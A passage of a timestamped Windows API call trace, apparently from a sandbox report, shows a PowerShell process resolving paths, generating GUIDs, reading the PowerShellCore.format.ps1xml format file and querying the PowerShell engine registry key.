	[0477.235] VirtualQuery (in: lpAddress=0x1ebbb0, lpBuffer=0x1eca70, dwLength=0x30 | out: lpBuffer=0x1eca70*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.238] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x963aa6e3, Data2=0xa383, Data3=0x4c43, Data4=([0]=0xa7, [1]=0x19, [2]=0x6d, [3]=0x78, [4]=0xde, [5]=0xc, [6]=0xa0, [7]=0xa))) returned 0x0
	[0477.827] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xf98c169c, Data2=0x827f, Data3=0x465d, Data4=([0]=0xb9, [1]=0xfe, [2]=0x9, [3]=0x58, [4]=0xc1, [5]=0xad, [6]=0x90, [7]=0x1f))) returned 0x0
	[0477.827] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xb1084145, Data2=0x442c, Data3=0x4b67, Data4=([0]=0x89, [1]=0x8b, [2]=0x5f, [3]=0x4c, [4]=0xa0, [5]=0x3b, [6]=0xa, [7]=0xee))) returned 0x0
	[0477.843] VirtualQuery (in: lpAddress=0x1ebb10, lpBuffer=0x1ec9d0, dwLength=0x30 | out: lpBuffer=0x1ec9d0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0477.844] VirtualQuery (in: lpAddress=0x1ebba0, lpBuffer=0x1eca60, dwLength=0x30 | out: lpBuffer=0x1eca60*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0477.848] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xccedd92e, Data2=0xceb4, Data3=0x4356, Data4=([0]=0xb7, [1]=0xbc, [2]=0x31, [3]=0x4, [4]=0x62, [5]=0xb6, [6]=0x98, [7]=0x3b))) returned 0x0
	[0477.849] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x4e66a0bb, Data2=0xce1b, Data3=0x475b, Data4=([0]=0x8f, [1]=0x68, [2]=0x25, [3]=0xd9, [4]=0x96, [5]=0xce, [6]=0xc1, [7]=0x3))) returned 0x0
	[0477.849] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xd241a366, Data2=0x869b, Data3=0x41a5, Data4=([0]=0xad, [1]=0x2a, [2]=0x9c, [3]=0x2, [4]=0x74, [5]=0x1e, [6]=0xfd, [7]=0xa7))) returned 0x0
	[0477.849] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xdde012c3, Data2=0xfa5e, Data3=0x4a6f, Data4=([0]=0x8e, [1]=0x1e, [2]=0x87, [3]=0xad, [4]=0x6b, [5]=0xf, [6]=0x7a, [7]=0x4c))) returned 0x0
	[0477.849] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x6d659d64, Data2=0xf8a6, Data3=0x4c17, Data4=([0]=0x8a, [1]=0xa, [2]=0x61, [3]=0x67, [4]=0x63, [5]=0xeb, [6]=0x63, [7]=0x99))) returned 0x0
	[0477.849] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xdca623b2, Data2=0x4dd5, Data3=0x4c79, Data4=([0]=0x89, [1]=0x26, [2]=0x17, [3]=0x35, [4]=0x2d, [5]=0x1b, [6]=0xd2, [7]=0xb9))) returned 0x0
	[0477.850] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x72862a98, Data2=0x4e68, Data3=0x431c, Data4=([0]=0x9f, [1]=0xca, [2]=0x87, [3]=0x69, [4]=0xba, [5]=0x81, [6]=0xf0, [7]=0x8f))) returned 0x0
	[0477.850] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xcd79c700, Data2=0x1063, Data3=0x4f0a, Data4=([0]=0x9e, [1]=0x7d, [2]=0xc1, [3]=0x7, [4]=0xa9, [5]=0x5e, [6]=0x56, [7]=0x68))) returned 0x0
	[0477.850] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x571c7fca, Data2=0xe048, Data3=0x4934, Data4=([0]=0xa7, [1]=0xa1, [2]=0x2a, [3]=0xd0, [4]=0xc1, [5]=0x43, [6]=0x62, [7]=0x3f))) returned 0x0
	[0477.851] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x217c068e, Data2=0x5735, Data3=0x44de, Data4=([0]=0xa0, [1]=0x1a, [2]=0x8, [3]=0xcc, [4]=0x17, [5]=0xda, [6]=0x99, [7]=0xc2))) returned 0x0
	[0477.852] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x50783899, Data2=0x2b3c, Data3=0x4ee2, Data4=([0]=0xa7, [1]=0x5f, [2]=0xa, [3]=0x0, [4]=0x40, [5]=0x2e, [6]=0x99, [7]=0x24))) returned 0x0
	[0477.853] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x6335abad, Data2=0x4e2, Data3=0x48a0, Data4=([0]=0x89, [1]=0x96, [2]=0xed, [3]=0x38, [4]=0xf8, [5]=0xa2, [6]=0xaa, [7]=0x5e))) returned 0x0
	[0477.853] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xe9dc1176, Data2=0x48c8, Data3=0x49f5, Data4=([0]=0xb6, [1]=0xb1, [2]=0x47, [3]=0xb4, [4]=0x54, [5]=0xba, [6]=0x35, [7]=0x14))) returned 0x0
	[0477.853] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xaade4b24, Data2=0x7068, Data3=0x48cd, Data4=([0]=0xa1, [1]=0xfb, [2]=0xc2, [3]=0x74, [4]=0x98, [5]=0xd9, [6]=0x22, [7]=0x18))) returned 0x0
	[0477.853] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x3f074ff4, Data2=0x972f, Data3=0x4946, Data4=([0]=0xaf, [1]=0x52, [2]=0x28, [3]=0xc5, [4]=0x56, [5]=0x45, [6]=0x32, [7]=0xb9))) returned 0x0
	[0477.854] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x61dd6115, Data2=0xe2be, Data3=0x4a1c, Data4=([0]=0xb5, [1]=0x63, [2]=0x2c, [3]=0x51, [4]=0x18, [5]=0x66, [6]=0xc0, [7]=0x61))) returned 0x0
	[0477.854] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x55b528e5, Data2=0xdb78, Data3=0x4f90, Data4=([0]=0x9c, [1]=0xf1, [2]=0x32, [3]=0x9a, [4]=0x26, [5]=0x8f, [6]=0xdc, [7]=0x8d))) returned 0x0
	[0477.854] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xdd73ff16, Data2=0x785, Data3=0x4214, Data4=([0]=0xb4, [1]=0xa5, [2]=0xbe, [3]=0x38, [4]=0xe1, [5]=0x40, [6]=0x2f, [7]=0x76))) returned 0x0
	[0477.854] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xa037451f, Data2=0xda6d, Data3=0x4719, Data4=([0]=0xa9, [1]=0xe2, [2]=0x67, [3]=0xcc, [4]=0x88, [5]=0xf5, [6]=0x61, [7]=0xff))) returned 0x0
	[0477.854] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0477.855] GetFileType (hFile=0x320) returned 0x1
	[0477.855] SetErrorMode (uMode=0x1) returned 0x1
	[0477.855] GetFileType (hFile=0x320) returned 0x1
	[0477.855] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.855] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.855] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.855] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.855] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.856] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.856] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.856] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.856] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.857] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.857] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.857] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.857] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.858] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.858] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.858] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.858] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.860] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.860] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.860] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.860] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.860] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0xe67, lpOverlapped=0x0) returned 1
	[0477.861] ReadFile (in: hFile=0x320, lpBuffer=0x313d0b7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313d0b7*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0477.861] ReadFile (in: hFile=0x320, lpBuffer=0x313dae8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x313dae8*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0477.861] CloseHandle (hObject=0x320) returned 1
	[0477.861] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0477.861] SetErrorMode (uMode=0x1) returned 0x1
	[0477.861] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0477.861] SetErrorMode (uMode=0x1) returned 0x1
	[0477.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0477.862] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x320) returned 0x0
	[0477.862] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0477.862] CoTaskMemAlloc (cb=0x5a) returned 0x4a6080
	[0477.862] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x4a6080, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0478.425] CoTaskMemFree (pv=0x4a6080) 
	[0478.425] RegCloseKey (hKey=0x320) returned 0x0
	[0478.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0478.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0478.427] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x11e611bf, Data2=0x3a54, Data3=0x4e54, Data4=([0]=0xbf, [1]=0xde, [2]=0xfe, [3]=0xfe, [4]=0xe4, [5]=0x1b, [6]=0x40, [7]=0xf6))) returned 0x0
	[0478.427] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x4477c07c, Data2=0x5988, Data3=0x41aa, Data4=([0]=0xb2, [1]=0x1f, [2]=0x13, [3]=0x43, [4]=0x72, [5]=0x3d, [6]=0xff, [7]=0xaf))) returned 0x0
	[0478.427] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xb06ec6ec, Data2=0xe947, Data3=0x4b5e, Data4=([0]=0x87, [1]=0xc0, [2]=0xa8, [3]=0xc2, [4]=0x16, [5]=0x71, [6]=0x8b, [7]=0xaa))) returned 0x0
	[0478.427] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x220dbfb9, Data2=0xb771, Data3=0x49a9, Data4=([0]=0xa1, [1]=0x5c, [2]=0x4d, [3]=0x18, [4]=0x58, [5]=0x9c, [6]=0x4f, [7]=0x34))) returned 0x0
	[0478.427] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x5886ec39, Data2=0xf5bc, Data3=0x4964, Data4=([0]=0x81, [1]=0xeb, [2]=0x28, [3]=0xb, [4]=0x39, [5]=0xd7, [6]=0x96, [7]=0xfe))) returned 0x0
	[0478.427] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xa41db425, Data2=0xb441, Data3=0x495e, Data4=([0]=0x8c, [1]=0xb, [2]=0xc2, [3]=0x3d, [4]=0xff, [5]=0x62, [6]=0xe1, [7]=0x3b))) returned 0x0
	[0478.427] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xadbc1cfb, Data2=0xa6b, Data3=0x4672, Data4=([0]=0xa9, [1]=0xba, [2]=0x9, [3]=0x9b, [4]=0x97, [5]=0x36, [6]=0x27, [7]=0xde))) returned 0x0
	[0478.428] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xe7551f31, Data2=0x1e15, Data3=0x47cc, Data4=([0]=0x90, [1]=0x7, [2]=0xce, [3]=0x7d, [4]=0x68, [5]=0xc7, [6]=0x8b, [7]=0x69))) returned 0x0
	[0478.428] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x5d7ce60d, Data2=0xe553, Data3=0x4ae8, Data4=([0]=0xab, [1]=0xf, [2]=0x6e, [3]=0x36, [4]=0xf3, [5]=0xf9, [6]=0x39, [7]=0xe0))) returned 0x0
	[0478.428] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x6b1b4377, Data2=0x3184, Data3=0x405b, Data4=([0]=0x8e, [1]=0x4d, [2]=0xf5, [3]=0x23, [4]=0xd0, [5]=0x2, [6]=0x20, [7]=0xf))) returned 0x0
	[0478.428] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xeda8eed6, Data2=0xc8e7, Data3=0x4556, Data4=([0]=0xb0, [1]=0x86, [2]=0x9d, [3]=0x16, [4]=0xf6, [5]=0x5f, [6]=0x60, [7]=0xbb))) returned 0x0
	[0478.428] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x5e895b6, Data2=0x61d9, Data3=0x4362, Data4=([0]=0x9e, [1]=0xb7, [2]=0x8d, [3]=0xb7, [4]=0xe1, [5]=0x7e, [6]=0x6e, [7]=0x95))) returned 0x0
	[0478.428] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x443d47a6, Data2=0x106d, Data3=0x4718, Data4=([0]=0xb6, [1]=0xd, [2]=0xe9, [3]=0xf1, [4]=0xa5, [5]=0xcc, [6]=0x75, [7]=0x40))) returned 0x0
	[0478.428] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x8cb3e1df, Data2=0xe054, Data3=0x432e, Data4=([0]=0xb0, [1]=0x3a, [2]=0x7d, [3]=0x1f, [4]=0x89, [5]=0x1b, [6]=0x8, [7]=0x91))) returned 0x0
	[0478.428] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x3861105f, Data2=0x1439, Data3=0x422a, Data4=([0]=0xa1, [1]=0x8d, [2]=0xdd, [3]=0x8b, [4]=0x50, [5]=0x47, [6]=0xb0, [7]=0x72))) returned 0x0
	[0478.429] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x7438f778, Data2=0x4da9, Data3=0x4233, Data4=([0]=0x81, [1]=0x9d, [2]=0xdb, [3]=0xac, [4]=0xe6, [5]=0x5f, [6]=0x29, [7]=0x57))) returned 0x0
	[0478.429] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x9696087a, Data2=0x347b, Data3=0x41aa, Data4=([0]=0x8d, [1]=0x1, [2]=0xd1, [3]=0xe6, [4]=0xf2, [5]=0xcb, [6]=0xa6, [7]=0xea))) returned 0x0
	[0478.429] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x1f60b544, Data2=0xfedc, Data3=0x455b, Data4=([0]=0x86, [1]=0x47, [2]=0x84, [3]=0xc6, [4]=0x8e, [5]=0x74, [6]=0xab, [7]=0xc9))) returned 0x0
	[0478.429] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x1c87a971, Data2=0xf0a7, Data3=0x4203, Data4=([0]=0x94, [1]=0xe9, [2]=0x68, [3]=0x5, [4]=0x35, [5]=0xc4, [6]=0x69, [7]=0x89))) returned 0x0
	[0478.429] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xe9ea45, Data2=0x1b06, Data3=0x4da0, Data4=([0]=0xa4, [1]=0x64, [2]=0x1c, [3]=0x59, [4]=0x89, [5]=0xf1, [6]=0x2f, [7]=0xb1))) returned 0x0
	[0478.429] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x87841487, Data2=0xb274, Data3=0x4201, Data4=([0]=0xa2, [1]=0xc2, [2]=0x84, [3]=0x96, [4]=0x3e, [5]=0x44, [6]=0x26, [7]=0x14))) returned 0x0
	[0478.430] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xf1323b41, Data2=0x497d, Data3=0x4e66, Data4=([0]=0x90, [1]=0xa3, [2]=0x71, [3]=0xdf, [4]=0xf1, [5]=0xca, [6]=0x15, [7]=0xaa))) returned 0x0
	[0478.430] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x9f53dc6c, Data2=0xa4a6, Data3=0x4257, Data4=([0]=0x91, [1]=0xc7, [2]=0xc6, [3]=0x17, [4]=0x19, [5]=0x97, [6]=0x2f, [7]=0xcc))) returned 0x0
	[0478.430] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xaad87d72, Data2=0xa10a, Data3=0x4d64, Data4=([0]=0xb5, [1]=0xb1, [2]=0x11, [3]=0x9a, [4]=0x5f, [5]=0xd8, [6]=0x94, [7]=0xdd))) returned 0x0
	[0478.430] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xcca058fc, Data2=0xb5e4, Data3=0x4875, Data4=([0]=0xa9, [1]=0xd6, [2]=0x0, [3]=0x9a, [4]=0x39, [5]=0xd3, [6]=0x29, [7]=0x8f))) returned 0x0
	[0478.430] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x1a918c61, Data2=0xbce9, Data3=0x410e, Data4=([0]=0xaa, [1]=0xdf, [2]=0xb3, [3]=0x2e, [4]=0x9a, [5]=0xe8, [6]=0x6c, [7]=0x5b))) returned 0x0
	[0478.430] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x83b16462, Data2=0x938e, Data3=0x4994, Data4=([0]=0x81, [1]=0xa2, [2]=0xdd, [3]=0xf3, [4]=0xc9, [5]=0x9f, [6]=0xd4, [7]=0x2e))) returned 0x0
	[0478.430] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xbec16009, Data2=0x326c, Data3=0x425a, Data4=([0]=0xbd, [1]=0x5e, [2]=0x12, [3]=0x41, [4]=0x7a, [5]=0x38, [6]=0xad, [7]=0xd9))) returned 0x0
	[0478.430] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xa9a7f29d, Data2=0xcd9f, Data3=0x4c1d, Data4=([0]=0xae, [1]=0x2e, [2]=0x1a, [3]=0xfd, [4]=0x37, [5]=0xfb, [6]=0xdb, [7]=0x48))) returned 0x0
	[0478.431] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x635bbec5, Data2=0xfe54, Data3=0x48e4, Data4=([0]=0x89, [1]=0xe, [2]=0x19, [3]=0xac, [4]=0xf1, [5]=0xb, [6]=0xd3, [7]=0x48))) returned 0x0
